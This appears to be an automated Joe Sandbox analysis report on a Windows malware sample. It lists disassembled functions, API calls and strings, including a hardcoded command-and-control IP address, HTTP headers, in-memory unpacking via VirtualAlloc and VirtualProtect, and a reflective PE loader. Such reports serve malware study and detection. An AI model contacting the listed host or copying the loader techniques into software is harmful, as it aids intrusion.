                      control_flow_graph 1413 4087e0-408807 call 402460 * 2 call 405a50 1419 40880c-408816 call 4106ab 1413->1419
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Sleep
                      • String ID: mixtwo$nosub
                      • API String ID: 3472027048-187875987
                      • Opcode ID: ab4f70d645e5df1053a7a44eb3d24a53cf0cacacc672b73b3debad2563601ef3
                      • Instruction ID: d051705d2d3a1196041d610bae506d61a1e8aa88cf060e84ab2565e50524cdd9
                      • Opcode Fuzzy Hash: ab4f70d645e5df1053a7a44eb3d24a53cf0cacacc672b73b3debad2563601ef3
                      • Instruction Fuzzy Hash: AAD05286F0420822C00031BE2E0FA1C3A18064262EFA0122AE820226C3B8882A2489EF
                      Function 00401830 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 106networkCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004018A3
                      • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004018C9
                      • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004018EF
                        • Part of subcall function 004024A0: Concurrency::cancel_current_task.LIBCPMT ref: 004025C9
                      • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401915
                      Strings
                      • Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 00401862
                      • GET, xrefs: 004020E7
                      • Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 004018CD
                      • Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 004018A7
                      • Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 004018F3
                      • http://, xrefs: 00401EF4, 004021D3
                      • text, xrefs: 00401B8F
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: HeadersHttpRequest$Concurrency::cancel_current_task
                      • String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1$GET$http://$text
                      • API String ID: 2146599340-4172842843
                      • Opcode ID: 422d38bf1008db8560859125de3d0501a6bdee6f1042d5366f80bf11e058982a
                      • Instruction ID: 7e6d5c8cd7aa1cabae0cdc9af9d1d54ef5f059dc9231cd92a953cd594aab5962
                      • Opcode Fuzzy Hash: 422d38bf1008db8560859125de3d0501a6bdee6f1042d5366f80bf11e058982a
                      • Instruction Fuzzy Hash: 05314371E00109EBEB14DBA9CC95FEEB7B9EB08714FA0812AE511735D0C7789945CBA4
                      Function 0494003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 728 494003c-4940047 729 494004c-4940263 call 4940a3f call 4940e0f call 4940d90 VirtualAlloc 728->729 730 4940049 728->730 746 4940265-4940289 call 4940a69 729->746 747 494028b-4940292 729->747 732 494004a 730->732 732->732 752 49402ce-49403c2 VirtualProtect call 4940cce call 4940ce7 746->752 749 49402a1-49402b0 747->749 751 49402b2-49402cc 749->751 749->752 751->749 758 49403d1-49403e0 752->758 759 49403e2-4940437 call 4940ce7 758->759 760 4940439-49404b8 VirtualFree 758->760 759->758 761 49405f4-49405fe 760->761 762 49404be-49404cd 760->762 765 4940604-494060d 761->765 766 494077f-4940789 761->766 764 49404d3-49404dd 762->764 764->761 771 49404e3-4940505 LoadLibraryA 764->771 765->766 772 4940613-4940637 765->772 769 49407a6-49407b0 766->769 770 494078b-49407a3 766->770 773 49407b6-49407cb 769->773 774 494086e-49408be LoadLibraryA 769->774 770->769 775 4940517-4940520 771->775 776 4940507-4940515 771->776 777 494063e-4940648 772->777 778 49407d2-49407d5 773->778 781 49408c7-49408f9 774->781 779 4940526-4940547 775->779 776->779 777->766 780 494064e-494065a 777->780 782 4940824-4940833 778->782 783 49407d7-49407e0 778->783 784 494054d-4940550 779->784 780->766 785 4940660-494066a 780->785 786 4940902-494091d 781->786 787 49408fb-4940901 781->787 793 4940839-494083c 782->793 788 49407e4-4940822 783->788 789 49407e2 783->789 790 4940556-494056b 784->790 791 49405e0-49405ef 784->791 792 494067a-4940689 785->792 787->786 788->778 789->782 794 494056d 790->794 795 494056f-494057a 790->795 791->764 796 4940750-494077a 792->796 797 494068f-49406b2 792->797 793->774 798 494083e-4940847 793->798 794->791 800 494057c-4940599 795->800 801 494059b-49405bb 795->801 796->777 802 49406b4-49406ed 797->802 803 49406ef-49406fc 797->803 804 4940849 798->804 805 494084b-494086c 798->805 812 49405bd-49405db 800->812 801->812 802->803 806 49406fe-4940748 803->806 807 494074b 803->807 804->774 805->793 806->807 807->792 812->784
                      APIs
                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0494024D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocVirtual
                      • String ID: cess$kernel32.dll
                      • API String ID: 4275171209-1230238691
                      • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                      • Instruction ID: ddbb7b09f19d5ec3bf19675422a8a6ba8997af91244f1046b3b4109762b90cf0
                      • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                      • Instruction Fuzzy Hash: B4527A74A01229DFDB64CF58C984BACBBB5BF49304F1480E9E54DAB351DB30AA85DF14
                      Function 00405A50 Relevance: 11.2, APIs: 2, Strings: 5, Instructions: 678sleepCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 813 405a50-406330 call 410822 call 4106e2 Sleep call 402760 * 2 call 403ab0 call 408ed0 call 408d80 * 3 call 406c40 call 408920 call 402460 call 408a70 call 402390 call 406ee0 call 4088e0 call 402460 call 408a70 call 402390 861 406404-40642f call 407290 call 4088e0 call 402460 call 408a70 call 402390 813->861 862 406336-4063ad call 406f60 call 4088e0 call 402460 call 4023e0 call 402390 call 406ff0 call 408900 call 402460 call 4023e0 call 402390 call 407070 call 408940 call 402460 call 408a70 call 402390 813->862 884 4064f3-40651e call 407630 call 4088c0 call 402460 call 408a70 call 402390 861->884 885 406435-4064ac call 407310 call 4088e0 call 402460 call 4023e0 call 402390 call 407390 call 408900 call 402460 call 4023e0 call 402390 call 407410 call 408940 call 402460 call 408a70 call 402390 861->885 952 4063cc-4063f7 call 407180 call 408940 call 402460 call 408a70 call 402390 862->952 953 4063af call 407100 862->953 918 406524-4065c1 call 4076b0 call 408920 call 402460 call 4023e0 call 402390 call 407730 call 408900 call 402460 call 4023e0 call 402390 call 4077b0 call 4088c0 call 402460 call 4023e0 call 402390 call 407830 call 4089c0 call 402460 call 408a70 call 402390 884->918 919 406608-406633 call 407a50 call 408890 call 402460 call 408a70 call 402390 884->919 1019 4064b8-4064e3 call 407520 call 408940 call 402460 call 408a70 call 402390 885->1019 1020 4064ae-4064b3 call 4074a0 885->1020 1151 4065c3-4065c8 call 4078c0 918->1151 1152 4065cd-4065f8 call 407940 call 4089c0 call 402460 call 408a70 call 402390 918->1152 965 4066b3-4066de call 407c70 call 408940 call 402460 call 408a70 call 402390 919->965 966 406635-4066ae call 407ae0 call 408900 call 402460 call 4023e0 call 402390 call 407b60 call 408940 call 402460 call 4023e0 call 402390 call 407bf0 call 4088c0 call 402460 call 4023e0 call 402390 919->966 1016 40687d-4069df call 4017a0 call 4083f0 call 408940 call 402460 call 408370 call 408920 call 402460 call 4082d0 call 4089a0 call 402460 call 408da0 call 408e00 call 408eb0 call 408e00 call 408eb0 call 408e00 call 402390 * 8 952->1016 1022 4063fd-406402 call 407210 952->1022 964 4063b4-4063c7 call 408920 call 402460 953->964 992 40686f-406878 call 4023e0 call 402390 964->992 1031 4066e0-406759 call 407d00 call 408900 call 402460 call 4023e0 call 402390 call 407d80 call 408920 call 402460 call 4023e0 call 402390 call 407e00 call 4088c0 call 402460 call 4023e0 call 402390 965->1031 1032 40675e-406789 call 407e80 call 408970 call 402460 call 408a70 call 402390 965->1032 966->1016 992->1016 1251 4069e5-4069fe call 402350 call 4021d0 1016->1251 1019->1016 1088 4064e9-4064ee call 4075b0 1019->1088 1020->964 1022->964 1031->1016 1098 40678b-4067dc call 407f10 call 408900 call 402460 call 4023e0 call 402390 call 407fd0 call 4088c0 call 402460 call 4023e0 call 402390 call 408050 1032->1098 1099 4067de-406809 call 4080d0 call 4088c0 call 402460 call 408a70 call 402390 1032->1099 1088->884 1223 40685c-40686c call 4088c0 call 402460 1098->1223 1099->1016 1166 40680b-406857 call 408150 call 408900 call 402460 call 4023e0 call 402390 call 4081d0 call 408920 call 402460 call 4023e0 call 402390 call 408250 1099->1166 1151->1152 1152->1016 1210 4065fe-406603 call 4079d0 1152->1210 1166->1223 1210->919 1223->992 1256 406a00-406a23 call 402210 call 402460 call 4025e0 1251->1256 1257 406a3e-406a45 Sleep 1251->1257 1256->1257 1264 406a47-406a9c call 402390 call 408c80 * 3 call 404f70 1256->1264 1257->1251
                      APIs
                        • Part of subcall function 00410822: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A9F,00000000,BBD3FB9F), ref: 00410837
                        • Part of subcall function 00410822: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410856
                      • Sleep.KERNEL32(000003E8), ref: 00405AB0
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Time$FileSleepSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                      • String ID: 185.156.72.65$185.156.72.65$SUB=$get$u%
                      • API String ID: 2563648476-311857291
                      • Opcode ID: 664b2517046e8848212832c9034c49cb43a53afe8dead0a995ac38afe4edbc90
                      • Instruction ID: 73809eb16a5d3869ae15fb7337a890a5b139b8f1a0f0395b135ebc5315de088a
                      • Opcode Fuzzy Hash: 664b2517046e8848212832c9034c49cb43a53afe8dead0a995ac38afe4edbc90
                      • Instruction Fuzzy Hash: 03326571D001189ACB19FB76C95AAEE73785F14308F10817FF846771D2EE7C6A48CAA9
                      Function 00401E50 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1274 401e50-401e9e 1275 401ea0-401ea5 1274->1275 1275->1275 1276 401ea7-402179 call 402760 * 2 call 40aff0 call 40d0f0 InternetOpenA 1275->1276 1289 4021a3-4021c0 call 409a17 1276->1289 1290 40217b-402187 1276->1290 1291 402199-4021a0 call 409b7c 1290->1291 1292 402189-402197 1290->1292 1291->1289 1292->1291 1294 4021c8-4021f9 call 40cfef call 401e50 1292->1294
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: http://
                      • API String ID: 0-1121587658
                      • Opcode ID: 62fa76301f8a52dd516a2f10eda550d712df552a2e5fa503cadb94ab45312fa8
                      • Instruction ID: 283a115399ec50033446259c01340d37f537f7c1e1c45d518ea9d7f2bb9a556a
                      • Opcode Fuzzy Hash: 62fa76301f8a52dd516a2f10eda550d712df552a2e5fa503cadb94ab45312fa8
                      • Instruction Fuzzy Hash: 11519071E002099FDF14CFA9C985BEEB7B9EB08304F10812EE915B76C1D7796944CB94
                      Function 005FBDA0 Relevance: 4.6, APIs: 3, Instructions: 90registryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1303 5fbda0-5fbda9 1304 5fd752-5fdecc 1303->1304 1307 5fdece-5fdee9 RegOpenKeyA 1304->1307 1308 5fdef5-5fdf10 RegOpenKeyA 1304->1308 1307->1308 1309 5fdeeb 1307->1309 1310 5fdf28-5fdf54 1308->1310 1311 5fdf12-5fdf1c 1308->1311 1309->1308 1314 5fdf56-5fdf5f GetNativeSystemInfo 1310->1314 1315 5fdf61-5fdf6b 1310->1315 1311->1310 1314->1315 1316 5fdf6d 1315->1316 1317 5fdf77-5fdf85 1315->1317 1316->1317 1319 5fdf87 1317->1319 1320 5fdf91-5fdf98 1317->1320 1319->1320 1321 5fdf9e-5fdfa5 1320->1321 1322 5fdfab 1320->1322 1321->1322 1323 5fe870-5fe877 1321->1323 1324 5ff7de-5ff806 1322->1324 1325 5fb42d-5fd1a8 1323->1325 1326 5fe87d-5fe897 1323->1326 1325->1304 1326->1324
                      APIs
                      • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 005FDEE1
                      • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 005FDF08
                      • GetNativeSystemInfo.KERNEL32(?), ref: 005FDF5F
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452325212.00000000005F9000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F9000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5f9000_file.jbxd
                      Similarity
                      • API ID: Open$InfoNativeSystem
                      • String ID:
                      • API String ID: 1247124224-0
                      • Opcode ID: 99a974dcb6bf27dde47257abbb1c4c8d39f2788c90d29e028ca4d410d00131f3
                      • Instruction ID: ad1476f2c5c2282c362c2931d9d67c2f7fe86fe6fcc2946cf25e7d8101d5fc6e
                      • Opcode Fuzzy Hash: 99a974dcb6bf27dde47257abbb1c4c8d39f2788c90d29e028ca4d410d00131f3
                      • Instruction Fuzzy Hash: 484109B240820EDEEB11DF10C849BEE3BB5FF15300F01042AEA8686950D37A5DA4DF9A
                      Function 005FD74C Relevance: 4.6, APIs: 3, Instructions: 68registryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1329 5fd74c-5fd75b 1331 5fdea1-5fdecc 1329->1331 1333 5fdece-5fdee9 RegOpenKeyA 1331->1333 1334 5fdef5-5fdf10 RegOpenKeyA 1331->1334 1333->1334 1335 5fdeeb 1333->1335 1336 5fdf28-5fdf54 1334->1336 1337 5fdf12-5fdf1c 1334->1337 1335->1334 1340 5fdf56-5fdf5f GetNativeSystemInfo 1336->1340 1341 5fdf61-5fdf6b 1336->1341 1337->1336 1340->1341 1342 5fdf6d 1341->1342 1343 5fdf77-5fdf85 1341->1343 1342->1343 1345 5fdf87 1343->1345 1346 5fdf91-5fdf98 1343->1346 1345->1346 1347 5fdf9e-5fdfa5 1346->1347 1348 5fdfab 1346->1348 1347->1348 1349 5fe870-5fe877 1347->1349 1350 5ff7de-5ff806 1348->1350 1351 5fb42d-5fd75b 1349->1351 1352 5fe87d-5fe897 1349->1352 1351->1331 1352->1350
                      APIs
                      • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 005FDEE1
                      • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 005FDF08
                      • GetNativeSystemInfo.KERNEL32(?), ref: 005FDF5F
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452325212.00000000005F9000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F9000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5f9000_file.jbxd
                      Similarity
                      • API ID: Open$InfoNativeSystem
                      • String ID:
                      • API String ID: 1247124224-0
                      • Opcode ID: 8d5145920b299bdbc2fcea49e532ff566b9d8bc6e3552d7091990b7a8d8baa11
                      • Instruction ID: 7ff49915214ea4558b39e2a253be8f81a8418928b4701f4a7a97d2f26dbdea16
                      • Opcode Fuzzy Hash: 8d5145920b299bdbc2fcea49e532ff566b9d8bc6e3552d7091990b7a8d8baa11
                      • Instruction Fuzzy Hash: 2031D87244420EDEEF11DF50C849AEE3BBAFF15304F500426EE8696850D77A4DA4DFA9
                      Function 005FDE9B Relevance: 4.6, APIs: 3, Instructions: 67registryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1356 5fde9b-5fdeb3 1357 5fdebf-5fdecc 1356->1357 1358 5fdece-5fdee9 RegOpenKeyA 1357->1358 1359 5fdef5-5fdf10 RegOpenKeyA 1357->1359 1358->1359 1360 5fdeeb 1358->1360 1361 5fdf28-5fdf54 1359->1361 1362 5fdf12-5fdf1c 1359->1362 1360->1359 1365 5fdf56-5fdf5f GetNativeSystemInfo 1361->1365 1366 5fdf61-5fdf6b 1361->1366 1362->1361 1365->1366 1367 5fdf6d 1366->1367 1368 5fdf77-5fdf85 1366->1368 1367->1368 1370 5fdf87 1368->1370 1371 5fdf91-5fdf98 1368->1371 1370->1371 1372 5fdf9e-5fdfa5 1371->1372 1373 5fdfab 1371->1373 1372->1373 1374 5fe870-5fe877 1372->1374 1375 5ff7de-5ff806 1373->1375 1376 5fb42d-5fdeb3 1374->1376 1377 5fe87d-5fe897 1374->1377 1376->1357 1377->1375
                      APIs
                      • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 005FDEE1
                      • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 005FDF08
                      • GetNativeSystemInfo.KERNEL32(?), ref: 005FDF5F
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452325212.00000000005F9000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F9000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5f9000_file.jbxd
                      Similarity
                      • API ID: Open$InfoNativeSystem
                      • String ID:
                      • API String ID: 1247124224-0
                      • Opcode ID: 5d5b91864cb9276cb113890cbacfaebd6fa2527ed91718c67e7697e326b17e0f
                      • Instruction ID: 56ca791bd1b53b76480c9df48f689a8e0216f7f69c5d12f534088d6c27e32743
                      • Opcode Fuzzy Hash: 5d5b91864cb9276cb113890cbacfaebd6fa2527ed91718c67e7697e326b17e0f
                      • Instruction Fuzzy Hash: 3031D97144424E9EEF12DF50C848AEE3FB9FF05304F500466EA8686851D7794DA4DF99
                      Function 00413CB9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32memoryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1382 413cb9-413cc5 1383 413cf7-413d02 call 40d0dd 1382->1383 1384 413cc7-413cc9 1382->1384 1391 413d04-413d06 1383->1391 1385 413ce2-413cf3 RtlAllocateHeap 1384->1385 1386 413ccb-413ccc 1384->1386 1389 413cf5 1385->1389 1390 413cce-413cd5 call 412473 1385->1390 1386->1385 1389->1391 1390->1383 1394 413cd7-413ce0 call 4116b2 1390->1394 1394->1383 1394->1385
                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,?,5(@,?,0040AD5B,?,5(@,185.156.72.65,?,?,004035B7,?,?,5(@), ref: 00413CEB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocateHeap
                      • String ID: 5(@
                      • API String ID: 1279760036-4133491027
                      • Opcode ID: 0317c977ae3de03b4a355117f1d18651feb64bc701aa808cd4791dde922aff94
                      • Instruction ID: 6b8e07f77369cee0563c76895a616f9db891ca7c172fe53b45855655e8c042ba
                      • Opcode Fuzzy Hash: 0317c977ae3de03b4a355117f1d18651feb64bc701aa808cd4791dde922aff94
                      • Instruction Fuzzy Hash: 10E0E5322002115BD6213F669C05BDB7A5C9B417A2F140137FC56F62D0EA6DCDC241ED
                      Function 04940E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1410 4940e0f-4940e24 SetErrorMode * 2 1411 4940e26 1410->1411 1412 4940e2b-4940e2c 1410->1412 1411->1412
                      APIs
                      • SetErrorMode.KERNEL32(00000400,?,?,04940223,?,?), ref: 04940E19
                      • SetErrorMode.KERNEL32(00000000,?,?,04940223,?,?), ref: 04940E1E
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorMode
                      • String ID:
                      • API String ID: 2340568224-0
                      • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                      • Instruction ID: 98d9a3b77034ec0415020b3f8d752fb2f2c3dff89f97121a55313444d61b48f8
                      • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                      • Instruction Fuzzy Hash: 4FD0123114512877D7002A94DC0DBCE7B1CDF05B62F008021FB0DD9080C770964046E5
                      Function 006FAECE Relevance: 1.5, APIs: 1, Instructions: 31memoryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1422 6faece-6faedb 1423 6faedd-6faefa call 6faefd 1422->1423 1424 6faf38-6faf48 VirtualProtect 1422->1424 1426 6faf4e 1424->1426 1427 6faf50-6faf6e call 6faf71 1424->1427 1426->1427
                      APIs
                      • VirtualProtect.KERNEL32(?), ref: 006FAF39
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452325212.00000000006FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 006FA000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_6fa000_file.jbxd
                      Similarity
                      • API ID: ProtectVirtual
                      • String ID:
                      • API String ID: 544645111-0
                      • Opcode ID: 23c45fe4738b11b558767df128fdff7dc533d14942ae1a528c864618e046577b
                      • Instruction ID: 21b0c5f6829abb8639ab509c74a7bf5af8c24eaf6e767a05ae08d78cb29b200f
                      • Opcode Fuzzy Hash: 23c45fe4738b11b558767df128fdff7dc533d14942ae1a528c864618e046577b
                      • Instruction Fuzzy Hash: 6DF024B258D38A1BC302DE7049917AD7FA28FA2310F29849ED288CB983C5F95845C70B
                      Function 006FAF0D Relevance: 1.5, APIs: 1, Instructions: 28memoryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1432 6faf0d-6faf48 VirtualProtect 1434 6faf4e 1432->1434 1435 6faf50-6faf6e call 6faf71 1432->1435 1434->1435
                      APIs
                      • VirtualProtect.KERNEL32(?), ref: 006FAF39
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452325212.00000000006FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 006FA000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_6fa000_file.jbxd
                      Similarity
                      • API ID: ProtectVirtual
                      • String ID:
                      • API String ID: 544645111-0
                      • Opcode ID: 42f56b1b56f9fe8804907939f4970a14e9fcb030ec4af842714e272e3bd4803c
                      • Instruction ID: 7c6ab0c80675211da077dbfcace833f076c875cdd35f594b8b2c8757e19526f8
                      • Opcode Fuzzy Hash: 42f56b1b56f9fe8804907939f4970a14e9fcb030ec4af842714e272e3bd4803c
                      • Instruction Fuzzy Hash: 44F055B145054E5FC745EFB0C4012DE36A3AF54300F388028D2488BB11D5B218108B45
                      Function 006FAF2C Relevance: 1.5, APIs: 1, Instructions: 18memoryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1438 6faf2c-6faf48 VirtualProtect 1440 6faf4e 1438->1440 1441 6faf50-6faf6e call 6faf71 1438->1441 1440->1441
                      APIs
                      • VirtualProtect.KERNEL32(?), ref: 006FAF39
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452325212.00000000006FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 006FA000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_6fa000_file.jbxd
                      Similarity
                      • API ID: ProtectVirtual
                      • String ID:
                      • API String ID: 544645111-0
                      • Opcode ID: 5d884ca636a47930c94db905d205a4c19e5ee0c8c6018a2ca54a56ae715789ca
                      • Instruction ID: c9acd3d79f85354e092b78da7b354409db738658ff467f1a52a157cfab9cfe3c
                      • Opcode Fuzzy Hash: 5d884ca636a47930c94db905d205a4c19e5ee0c8c6018a2ca54a56ae715789ca
                      • Instruction Fuzzy Hash: 8CE026B294024A1FC768DE34C48179E36A3AF90301F78C028E1588BA45CAB868008B44
                      Function 005FD648 Relevance: 1.5, APIs: 1, Instructions: 13libraryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452325212.00000000005F9000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F9000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5f9000_file.jbxd
                      Similarity
                      • API ID: LibraryLoad
                      • String ID:
                      • API String ID: 1029625771-0
                      • Opcode ID: c8acbaf9d1f0fdeeae18d027ca47e05cfe8310da61f7403f3d514fd56daddb4f
                      • Instruction ID: cf1e44a296bd45961cd0e42debf124495e94a721b9311fd2533768d20260c536
                      • Opcode Fuzzy Hash: c8acbaf9d1f0fdeeae18d027ca47e05cfe8310da61f7403f3d514fd56daddb4f
                      • Instruction Fuzzy Hash: C5D017B260C909CBC304AF28A445128FAA1BBC0274F229A3D82E586590E53800488B56
                      Function 04798123 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                      Download Yara Rule
                      APIs
                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 04798174
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453741215.0000000004790000.00000040.00001000.00020000.00000000.sdmp, Offset: 04790000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4790000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                      • Instruction ID: 3a8a135cfd3c209053a50b5584947d4b1d8406fe23487f1b01be3a0bf574a5ba
                      • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                      • Instruction Fuzzy Hash: AF113C79A40208EFDB01DF98C985E98BBF5AF08350F058094F9489B361D371EA90DF81

                      Non-executed Functions

                      Function 00402EE0 Relevance: 33.7, APIs: 11, Strings: 8, Instructions: 454COMMON
                      Download Yara Rule
                      APIs
                      • SetLastError.KERNEL32(0000000D), ref: 00402F02
                      • SetLastError.KERNEL32(000000C1), ref: 00402F44
                      Strings
                      • Size is not valid!, xrefs: 00402F08
                      • FileHeader.Machine != HOST_MACHINE!, xrefs: 00402FB3
                      • DOS header is not valid!, xrefs: 00402F32
                      • DOS header size is not valid!, xrefs: 00402F71
                      • Signature != IMAGE_NT_SIGNATURE!, xrefs: 00402FA1
                      • ERROR_OUTOFMEMORY!, xrefs: 00403062
                      • alignedImageSize != AlignValueUp!, xrefs: 0040302C
                      • Section alignment invalid!, xrefs: 00402FC7
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorLast
                      • String ID: DOS header is not valid!$DOS header size is not valid!$ERROR_OUTOFMEMORY!$FileHeader.Machine != HOST_MACHINE!$Section alignment invalid!$Signature != IMAGE_NT_SIGNATURE!$Size is not valid!$alignedImageSize != AlignValueUp!
                      • API String ID: 1452528299-2436911586
                      • Opcode ID: 969231b7725f6e648ae7b53270e343726ac677e9ab86d7066b7749be6261437e
                      • Instruction ID: feefb59cb084f329bf9f2ee3fcaf904be4f7c95626e3fbc9d9f9d2488596d2a7
                      • Opcode Fuzzy Hash: 969231b7725f6e648ae7b53270e343726ac677e9ab86d7066b7749be6261437e
                      • Instruction Fuzzy Hash: C3F1AC71B00205ABCB10CF69D985BAAB7B4BF48705F14407AE909EB6C1D779ED11CB98
                      Function 04943837 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 225encryptionCOMMON
                      Download Yara Rule
                      APIs
                      • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,0042C014), ref: 049438B7
                      • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 049438DB
